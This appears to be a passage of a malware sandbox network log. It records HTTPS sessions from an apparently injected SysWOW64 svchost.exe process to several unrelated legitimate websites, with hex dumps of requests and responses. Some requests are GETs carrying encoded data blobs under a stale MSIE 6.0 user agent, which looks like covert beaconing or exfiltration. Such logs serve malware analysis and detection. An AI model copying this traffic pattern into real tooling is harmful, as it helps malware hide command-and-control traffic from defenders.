                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2281INData Raw: 3e 20 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 69 74 65 6d 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 6c 61 62 65 6c 22 3e 4e 75 65 76 6f 20 53 6f 74 6f 6d 61 79 6f 72 3c 2f 64 69 76 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 74 65 78 74 22 3e 4e 75 65 76 6f 20 53 6f 74 6f 6d 61 79 6f 72 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 69 74 65 6d 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 6c 61 62 65 6c 22 3e 50 42 58 3c 2f 64 69 76 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 74 65 78 74 22 3e 50 42 58 3a 20 2b 35 37 20 36 30 37 20
                                                                                                                                                                                                                                                                        Data Ascii: > </div><div class="g-contact-item"><div class="g-contact-label">Nuevo Sotomayor</div> <div class="g-contact-text">Nuevo Sotomayor</div> </div><div class="g-contact-item"><div class="g-contact-label">PBX</div> <div class="g-contact-text">PBX: +57 607
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2282INData Raw: 65 22 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 20 67 2d 70 61 72 74 69 63 6c 65 22 3e 20 3c 61 20 68 72 65 66 3d 22 2f 22 20 74 69 74 6c 65 3d 22 22 20 72 65 6c 3d 22 68 6f 6d 65 22 20 63 6c 61 73 73 3d 22 67 2d 66 6f 6f 74 65 72 2d 6c 6f 67 6f 22 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 32 30 32 31 2f 49 63 6f 6e 74 65 63 5f 4c 6f 67 6f 2e 6a 70 67 22 20 61 6c 74 3d 22 43 6c 69 6e 69 63 61 20 53 61 6e 20 4c 75 69 73 22 20 2f 3e 0a 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 20 73 69 7a 65 2d 33 33 2d 33 22 3e 0a 3c 64 69 76 20 69 64 3d 22 74 6f 74 6f 70 2d 36 38 34 36 2d 70 61 72 74 69 63 6c 65 22 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 20 67
                                                                                                                                                                                                                                                                        Data Ascii: e" class="g-content g-particle"> <a href="/" title="" rel="home" class="g-footer-logo"><img src="/images/2021/Icontec_Logo.jpg" alt="Clinica San Luis" /></a></div></div><div class="g-block size-33-3"><div id="totop-6846-particle" class="g-content g
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2284INData Raw: 34 34 32 0d 0a 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 6a 73 2f 6d 61 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 70 20 63 6c 61 73 73 3d 22 70 69 6e 22 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 70 74 3b 22 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 62 6f 74 74 6f 6d 3a 20 30 70 78 3b 20 72 69 67 68 74 3a 30 70 78 3b 20 7a 2d 69 6e 64 65 78 3a 39 39 39 39 39 39 39 39 39 39 39 39 3b 20 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 22 3e 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 4a 61 76
                                                                                                                                                                                                                                                                        Data Ascii: 442e="text/javascript" src="/media/gantry5/assets/js/main.js"></script><p class="pin"><span style="font-size: 10pt;"><div style="position: fixed; bottom: 0px; right:0px; z-index:999999999999; display:block;"><script language="JavaScript" type="text/Jav
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2285INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        146192.168.2.66324149.212.235.175443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:28 UTC2229OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: nts-web.net
                                                                                                                                                                                                                                                                        Content-Length: 4868
                                                                                                                                                                                                                                                                        2023-03-10 06:56:28 UTC2229OUTData Raw: 75 4a 56 59 65 75 44 70 37 66 44 7a 39 67 41 45 42 77 6b 4c 44 68 41 53 46 42 64 35 44 30 70 73 4c 41 66 77 44 59 45 6e 2f 68 55 58 49 55 57 39 77 71 72 48 70 6c 33 53 38 6b 67 55 56 35 6f 32 62 59 72 7a 4f 61 35 35 38 66 43 39 53 6c 55 72 58 6d 47 55 69 54 34 7a 76 37 75 5a 47 57 42 2f 47 71 51 36 54 4d 37 34 58 66 2b 59 58 76 53 51 43 4d 45 5a 55 49 46 77 64 37 4b 6a 66 69 6d 5a 59 6e 39 6a 75 53 6a 49 69 52 46 6d 32 77 56 6a 74 4d 51 37 2b 47 50 43 73 55 53 4d 50 62 5a 55 38 46 58 2b 6d 58 4a 6f 72 38 63 75 72 72 36 76 59 6f 38 52 69 72 32 77 78 58 61 4e 53 41 4b 4b 31 4b 55 67 72 46 34 55 32 47 50 6e 78 45 64 4c 45 78 63 6e 48 74 67 78 61 58 6b 59 47 4e 78 54 4b 63 50 61 63 50 39 33 50 67 43 44 2b 6e 56 42 54 53 30 67 4c 4a 73 31 57 43 77 30 4f 65 34
                                                                                                                                                                                                                                                                        Data Ascii: uJVYeuDp7fDz9gAEBwkLDhASFBd5D0psLAfwDYEn/hUXIUW9wqrHpl3S8kgUV5o2bYrzOa558fC9SlUrXmGUiT4zv7uZGWB/GqQ6TM74Xf+YXvSQCMEZUIFwd7KjfimZYn9juSjIiRFm2wVjtMQ7+GPCsUSMPbZU8FX+mXJor8curr6vYo8Rir2wxXaNSAKK1KUgrF4U2GPnxEdLExcnHtgxaXkYGNxTKcPacP93PgCD+nVBTS0gLJs1WCw0Oe4


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        147192.168.2.66371591.229.22.126443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:28 UTC2234OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: pleszew.policja.gov.pl
                                                                                                                                                                                                                                                                        2023-03-10 06:56:28 UTC2235INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:57:06 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        2023-03-10 06:56:28 UTC2235INData Raw: 31 66 63 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 6c 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 20 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 6e 64 65 78 2c 20 46 6f 6c 6c 6f 77 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 50 50 20 50 6c 65
                                                                                                                                                                                                                                                                        Data Ascii: 1fc0<!DOCTYPE html><html lang="pl"> <head> <meta charset="UTF-8"/> <meta name="description" content=" "/> <meta name="keywords" content=""/> <meta name="robots" content="Index, Follow"/> <meta name="author" content="KPP Ple
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2285INData Raw: 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 3c 2f 61 72 74 69 63 6c 65 3e 0d 0a 20 20 20 20 20 0d 0a 20 20 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0d 0a 20 20 20 20 0d 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 21 2d 2d 20 20 74 6f 70 6e 65 77 73 2e 20 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 20 63 6f 6e 74 65 6e 74 20 20 2d 2d 0d 0a 32 30 30 30 0d 0a 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 20 0d 0a 20 20 3c 21 2d 2d 20 20 63 6f 6e 74 65 6e 74 2d 6c 65 66 74 20 20 2d 2d 3e 0d 0a 20 20 3c 61 72 74 69 63 6c 65 20 69 64 3d 22 77 74 78 74 22 20 63 6c 61 73 73 3d 22 6d 61 69 6e 4c 65 66 74 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 21 2d 2d 20 20 61 6b 74 75 61 6c
                                                                                                                                                                                                                                                                        Data Ascii: </div> </div> </article> </section> </section></div>... topnews. -->... content --2000><div id="content"> ... content-left --> <article id="wtxt" class="mainLeft"> ... aktual
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2301INData Raw: 74 3a 31 37 39 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 30 70 78 22 3e 3c 61 20 68 72 65 66 3d 22 2f 77 32 30 2f 62 61 74 6f 6e 79 2f 34 35 39 36 2c 5a 6f 73 74 61 6e 2d 6a 65 64 6e 79 6d 2d 7a 2d 6e 61 73 2d 50 52 41 43 41 2d 57 2d 50 4f 4c 49 43 4a 49 2e 68 74 6d 6c 22 20 74 61 72 67 65 74 3d 22 5f 74 6f 70 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 64 6f 6b 75 6d 65 6e 74 79 2f 62 61 74 6f 6e 79 2f 34 35 39 36 2e 6a 70 67 3f 0d 0a 31 30 30 30 0d 0a 76 3d 31 36 35 37 31 31 32 36 31 38 22 20 61 6c 74 3d 22 5a 6f 73 74 61 c5 84 20 6a 65 64 6e 79 6d 20 7a 20 6e 61 73 20 2d 20 50 52 41 43 41 20 57 20 50 4f 4c 49 43 4a 49 22 20 2f 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 09 09 0a 09 0a 09 09 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 74 65 6d 22
                                                                                                                                                                                                                                                                        Data Ascii: t:179px;margin-bottom:10px"><a href="/w20/batony/4596,Zostan-jednym-z-nas-PRACA-W-POLICJI.html" target="_top"><img src="/dokumenty/batony/4596.jpg?1000v=1657112618" alt="Zosta jednym z nas - PRACA W POLICJI" /></a></div><div class="item"
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2317INData Raw: 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 3c 2f 66 6f 6f 74 65 72 3e 0d 0a 20 20 20 20 20 20 3c 21 2d 2d 20 66 6f 6f 74 65 72 20 2e 2d 2d 3e 0d 0a 20 20 20 20 20 0d 0a 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 21 2d 2d 20 47 6f 54 6f 54 6f 70 20 20 2d 2d 3e 0d 0a 20 20 09 3c 64 69 76 20 69 64 3d 22 62 61 63 6b 2d 74 6f 2d 74 6f 70 22 3e 3c 61 20 68 72 65 66 3d 22 23 70 61 67 65 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 0d 0a 61 34 0d 0a 63 6c 61 73 73 3d 22 73 72 2d 6f 6e 6c 79 22 3e 50 6f 77 72 c3 b3 74 20 6e 61 20 67 c3 b3 72 c4 99 20 73 74 72 6f 6e 79 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0d 0a 20 20 09 3c 21 2d 2d 20 47 6f 54 6f 54 6f 70 20 20 2e 2d
                                                                                                                                                                                                                                                                        Data Ascii: div> </div> </footer> ... footer .--> </div> ... GoToTop --> <div id="back-to-top"><a href="#page"><span></span><span a4class="sr-only">Powrt na gr strony</span></a></div> ... GoToTop .-


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        148192.168.2.663835172.67.156.49443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:28 UTC2234OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: orlyhotel.com
                                                                                                                                                                                                                                                                        Cookie: django_language=en
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2317INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:29 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Cache-Control: max-age=0, no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Expires: Fri, 10 Mar 2023 06:46:33 GMT
                                                                                                                                                                                                                                                                        Content-Language: en
                                                                                                                                                                                                                                                                        Last-Modified: Fri, 10 Mar 2023 06:46:33 GMT
                                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                        Vary: Accept-Language
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6%2B%2BZESbbI0aHSZ24YtiqwyEvmKXRW5TE7eTqbORTjoaazTat85oiyZv5OXYqFdmDUDX8kE2JPGVtm9b539mZhLffa3hrvCxTf5yd4sQG%2B3AH%2FEVS2GzE0mCswNi2EHT8"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 7a59a8750aa13684-FRA
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2318INData Raw: 31 62 0d 0a 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 20 28 35 30 30 29 3c 2f 68 31 3e 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 1b<h1>Server Error (500)</h1>
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2318INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        149192.168.2.663846185.237.66.112443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:28 UTC2234OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: techtrans.de
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2251INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:28 GMT
                                                                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                        Expires: 0
                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                        Upgrade: h2,h2c
                                                                                                                                                                                                                                                                        Connection: Upgrade, close
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2251INData Raw: 32 64 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 2f 68 65 61 64 3e 3c
                                                                                                                                                                                                                                                                        Data Ascii: 2de<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv="Content-Type" content="text/html; charset=utf-8"></head><


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        15192.168.2.6529505.189.171.125443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:14 UTC210OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: www.muhr-soehne.de
                                                                                                                                                                                                                                                                        Content-Length: 4428
                                                                                                                                                                                                                                                                        2023-03-10 06:56:14 UTC211OUTData Raw: 61 5a 49 73 4f 54 39 4a 54 56 42 54 56 31 70 64 59 47 4e 6d 61 6d 31 77 63 33 65 77 76 58 73 65 62 78 4a 4a 54 62 39 2b 58 34 72 72 4f 31 31 72 4b 77 4e 6b 6d 65 6c 74 45 39 57 7a 31 51 36 65 4d 55 35 41 69 57 79 64 48 46 7a 41 66 62 71 68 5a 32 61 57 36 45 78 73 56 43 6d 32 79 4b 6a 47 68 36 79 58 53 4b 42 6f 34 75 6f 4e 6b 7a 53 69 49 58 4b 6c 35 68 59 63 44 48 64 52 76 63 71 6f 61 78 45 6c 6b 64 69 73 4b 55 4d 4f 34 4b 66 31 72 48 5a 71 51 4e 54 51 2f 77 33 53 61 48 65 4e 72 59 52 46 56 47 38 63 55 54 64 6a 2b 6d 6c 79 6a 74 56 63 75 6c 42 37 45 42 57 64 56 6b 69 34 55 76 37 32 53 4b 4e 42 47 77 7a 2f 78 34 75 53 6e 2b 38 6e 4b 4d 50 6c 2b 74 74 52 45 53 77 53 54 34 54 72 45 4c 69 42 59 4d 71 4f 38 58 6f 46 48 6e 4f 51 6a 59 70 69 71 39 6c 4a 4e 6f 6e
                                                                                                                                                                                                                                                                        Data Ascii: aZIsOT9JTVBTV1pdYGNmam1wc3ewvXsebxJJTb9+X4rrO11rKwNkmeltE9Wz1Q6eMU5AiWydHFzAfbqhZ2aW6ExsVCm2yKjGh6yXSKBo4uoNkzSiIXKl5hYcDHdRvcqoaxElkdisKUMO4Kf1rHZqQNTQ/w3SaHeNrYRFVG8cUTdj+mlyjtVculB7EBWdVki4Uv72SKNBGwz/x4uSn+8nKMPl+ttRESwST4TrELiBYMqO8XoFHnOQjYpiq9lJNon
                                                                                                                                                                                                                                                                        2023-03-10 06:56:14 UTC216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:14 GMT
                                                                                                                                                                                                                                                                        Server: Apache/2.4.38 (Debian)
                                                                                                                                                                                                                                                                        Last-Modified: Thu, 02 Mar 2023 15:05:19 GMT
                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                        Content-Length: 51841
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                        2023-03-10 06:56:14 UTC216INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 64 65 22 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 21 2d 2d 20 0a 09 6d 61 64 65 20 62 79 20 50 53 56 6e 65 6f 0a 0a 09 54 68 69 73 20 77 65 62 73 69 74 65 20 69 73 20 70 6f 77 65 72 65 64 20 62 79 20 54 59 50 4f 33 20 2d 20 69 6e 73 70 69 72 69 6e 67 20 70 65 6f 70 6c 65 20 74 6f 20 73 68 61 72 65 21 0a 09 54 59 50 4f 33 20 69 73 20 61 20 66 72 65 65 20 6f 70 65 6e 20 73 6f 75 72 63 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 65 6e 74 20 46 72 61 6d 65 77 6f 72 6b 20 69 6e 69 74 69 61 6c 6c 79 20 63 72 65 61 74 65 64 20 62 79 20 4b 61 73 70 65 72 20 53 6b 61 61 72 68 6f 6a 20
                                                                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html dir="ltr" lang="de"><head><meta charset="utf-8">... made by PSVneoThis website is powered by TYPO3 - inspiring people to share!TYPO3 is a free open source Content Management Framework initially created by Kasper Skaarhoj
                                                                                                                                                                                                                                                                        2023-03-10 06:56:14 UTC232INData Raw: 20 20 20 20 20 20 20 56 65 72 73 63 68 6c 69 65 c3 9f 6d 61 73 63 68 69 6e 65 6e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 20 6c 61 79 6f 75 74 2d 30 20 20 22 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 76 65 72 73 63 68 6c 69 65
                                                                                                                                                                                                                                                                        Data Ascii: Verschliemaschinen </a> </li> <li class="nav-item layout-0 "> <a href="/verschlie
                                                                                                                                                                                                                                                                        2023-03-10 06:56:14 UTC261INData Raw: 66 72 61 6d 65 2d 6c 61 79 6f 75 74 2d 30 20 20 20 6d 74 2d 30 20 6d 62 2d 30 0a 20 20 20 20 0a 0a 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 6c 2d 33 20 63 6f 6c 2d 6c 67 2d 36 20 63 6f 6c 2d 6d 64 2d 36 20 63 6f 6c 2d 73 6d 2d 31 32 20 63 6f 6c 2d 31 32 20 6d 79 2d 34 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 65 72 76 69 63 65 62 6f 78 20 68 2d 31 30 30 20 62 67 2d 6c 69 67 68 74 2d 67 72 65 79 20 64 2d 66 6c 65 78 20 66 6c 65 78 2d 63 6f 6c 75 6d 6e 20 68 2d 31 30 30 20 77 2d 31 30 30 20 70 2d 33 20 22 3e 0a
                                                                                                                                                                                                                                                                        Data Ascii: frame-layout-0 mt-0 mb-0 "> <div class="row"> <div class="col-xl-3 col-lg-6 col-md-6 col-sm-12 col-12 my-4"> <div class="servicebox h-100 bg-light-grey d-flex flex-column h-100 w-100 p-3 ">
                                                                                                                                                                                                                                                                        2023-03-10 06:56:14 UTC277INData Raw: 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 2d 63 65 6e 74 65 72 20 6d 79 2d 33 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 78 2d 30 20 6d 78 2d 6d 64 2d 35 20 6d 79 2d 32 20 6d 79 2d 6d 64 2d 30 22 20 69 74 65 6d 70 72 6f 70 3d 22 69 74 65 6d 4c 69 73 74 45 6c 65 6d 65 6e 74 22 20 69 74 65 6d 73 63 6f 70 65 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 4c 69 73 74 49 74 65 6d 22 20 61 72 69 61 2d 63 75 72 72 65 6e 74 3d 22 70 61 67 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72
                                                                                                                                                                                                                                                                        Data Ascii: justify-content-center my-3"> <li class="mx-0 mx-md-5 my-2 my-md-0" itemprop="itemListElement" itemscope itemtype="https://schema.org/ListItem" aria-current="page"> <a hr


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
